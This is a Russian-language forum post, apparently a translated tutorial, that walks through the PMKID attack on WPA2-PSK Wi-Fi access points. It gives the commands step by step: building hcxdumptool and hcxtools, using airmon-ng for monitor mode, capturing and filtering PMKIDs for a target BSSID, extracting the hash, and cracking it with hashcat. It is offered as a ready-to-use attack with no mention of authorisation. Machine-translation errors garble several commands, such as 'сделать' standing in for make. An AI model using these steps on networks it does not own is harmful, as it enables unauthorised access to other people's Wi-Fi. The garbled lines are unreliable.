Взлом Wi-Fi, часть 11: Атака PMKID

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
152
Депозит
-8.95$
Добро пожаловать обратно, мои начинающие кибервоины!

Как вы знаете, ключ к взлому WPA2-PSK — это перехват PSK (предварительно предоставленного ключа или пароля) во время его передачи по воздуху в ходе четырёхстороннего рукопожатия между клиентом и точкой доступа (для этого необходимо находиться в режиме мониторинга). Для этого необходимо либо дождаться подключения клиента к точке доступа, либо, если клиент уже подключился, отключить его (деаутентифицировать) и дождаться повторного подключения.

6a4a49_17f4070e620046fabd74c8547fdedf14~mv2.png


Что, если бы мы могли пропустить этот шаг и получить хеш пароля напрямую от точки доступа? Именно это и представляет собой атака PMKID!

Этот новый метод (август 2018 г.) был разработан специалистами по безопасности из hashcat , быстрого инструмента для взлома паролей на базе Linux. Они проводили исследования взлома Wi-Fi с помощью инструментов из репозитория hcxtools, и обнаружили нечто интересное. Они обнаружили, что могут извлекать информацию непосредственно из точки доступа, содержащей общий ключ (PSK), без подключения клиента к точке доступа!

Давайте посмотрим, как работает этот инструмент, и используем его на некоторых точках доступа.

Шаг №1: Загрузите и установите hcxdumptool

Необходимые нам для этого хака инструменты не встроены в Kali, но мы можем получить их на github.com.

Для начала нам нужно скачать hcxtools.

kali > git clone https://github.com/ZerBea/hcxtools.git

6a4a49_2ef4d55d9ba346658cec2fb529280930~mv2.png


Далее скачиваем hcxdumptools.

kali > git clone https://github.com/ZerBea/hcxdumptool.git

После загрузки нам необходимо создать и установить каждый из этих инструментов.

Перейдите в новый каталог hcxdumptool.

kali > cd hcxdumptool

Затем запустите make и make install

кали > сделать

кали > сделать установку


6a4a49_a00fc46f8d6a446aa683dd7a71335964~mv2.png


Затем перейдите в каталог hcxtools и сделайте то же самое.

kali > cd hcxtools

кали > сделать

кали > сделать установку

Шаг №2: переведите беспроводной адаптер в режим мониторинга с помощью airmon-ng


Далее нам необходимо запустить airmon-ng из пакета инструментов для взлома Wi-Fi aircrack-ng, чтобы перевести наш беспроводной адаптер в режим монитора.

kali > airmon-ng start wlan0

Обратите внимание, что при запуске airmon-ng ваша беспроводная карта будет переименована с wlan0 на wlan0mon.

6a4a49_04907a6767864300b9a6091d50a1442f~mv2.png


Теперь запустите airodump-ng на беспроводном адаптере в режиме монитора.

kali > airodump-ng wlan0mon

6a4a49_4d99535eb7a24dfba5eecb6eb6cae9bd~mv2.png


Шаг №3: Используйте hcxdumptool для захвата PMKID

Следующий шаг — использование hcxdumptool для доступа к точкам доступа Wi-Fi и получения PMKID, содержащего PSK (предварительно предоставленный ключ или пароль).

kali > hcxdumptool -i wlan0mon -o Hackers-ArisePMKID –enable_status=1

Где:

-i
указывает на адаптер Wi-Fi (в данном случае wlan0mon)

-o — для вывода. Это файл, в который вы указываете PMKID для записи.

–enable_status=1

6a4a49_3716ab86c0104ef8be075fed718d2652~mv2.png


Теперь выполните команду и наберитесь терпения. В некоторых случаях сбор всех PMKID может занять несколько часов. Как видно на снимке экрана выше, hcxdumptool собирает и перечисляет каждый PMKID для каждой точки доступа в зоне действия.

Шаг №4: Получение одного PMKID

В большинстве случаев вам, вероятно, не захочется захватывать все PMKID в зоне действия, а лучше выбрать один конкретный. Это можно сделать, добавив фильтр по BSSID целевой точки доступа.

Для этого вам потребуется создать текстовый файл, содержащий только BSSID целевой точки доступа без двоеточий и запятых. Это можно сделать с помощью команды cat, например:

kali > cat > целевой BSSID

>aabbccddeeff


Для выхода из cat используйте сочетание клавиш CTRL+D. Убедитесь, что вторая строка содержит целевой BSSID и ничего больше.

Теперь создается простой текстовый файл целевого BSSID, который может прочитать hcxdumptool .

Теперь, чтобы использовать этот фильтр для одной точки доступа, мы просто добавляем несколько параметров к нашей предыдущей команде. Самое главное, мы добавляем

–filterlist_ap=targetBSSID

–filtermode=2


Эти два параметра указывают hcxdumptool использовать BSSID точки доступа в качестве фильтра и захватывать PMKID только из этой одной точки доступа.

kali > kali > hcxdumptool -i wlan0mon -o Hackers-ArisePMKID

–enable_status=1 –filterlist_ap=targetBSSID –filtermode=2


6a4a49_16cbc1c645b94f66ade4f4d9fc4ef316~mv2.png


Обратите внимание, что через некоторое время (в некоторых случаях — через несколько часов) hcxdumptool смог захватить PMKID единственной целевой точки доступа и поместить его в наш файл «HackersArisePMKID»!

Шаг №5: Удалите все лишние данные из PMKID

PMKID содержит хэш PSK, а также множество другой информации, которая нам не нужна. Нам нужно удалить эти данные, оставив только хэш PSK, прежде чем мы сможем приступить к взлому хеша. Для этого нам понадобится hcxcaptool , входящий в набор инструментов, которые мы скачали ранее в составе hcxtools .

Перейдите в каталог hcxtool .

kali > cd hcxtools

Теперь мы используем hcxcaptool , чтобы удалить всю остальную информацию из этого файла, оставив нам только хэш PSK.

kali > hcxcaptool -z hashoutput.txt HackersArisePMKID

Теперь у нас останется хэш PSK в файле, который мы указали здесь после опции -z, hashoutput.txt

Шаг №6: Взломайте гашиш!

Наш последний шаг — взломать хеш. Это можно сделать с помощью любого инструмента для взлома паролей из нашего арсенала, включая john, hashcat и многие другие. В данном случае я буду использовать hashcat, используя в качестве словаря 10 000 самых популярных паролей.

kali > hashcat -m 16800 hashoutput.txt top100000password.txt

6a4a49_f43979aba777465cba3e7ff9c0e3c822~mv2.png


Где:

hashcat
— это инструмент для взлома хешей паролей

-m 16800 обозначает тип хеша

hashoutput.txt — это файл, содержащий вырезанный хеш PSK

top100000passwords.txt — это простой текстовый файл, содержащий 10 000 наиболее распространенных паролей.

Краткое содержание

Новая атака PMKID (август 2018 г.) открывает нам ещё один метод атаки на точки доступа Wi-Fi с поддержкой WPA2-PSK. Преимущество этой атаки в том, что нам не нужно ждать подключения клиента, ассоциирования или деаутентификации. В моих тестах 80–90% беспроводных точек доступа возвращают PMKID при проверке с помощью hcxdumptool .
 
Назад
Сверху Снизу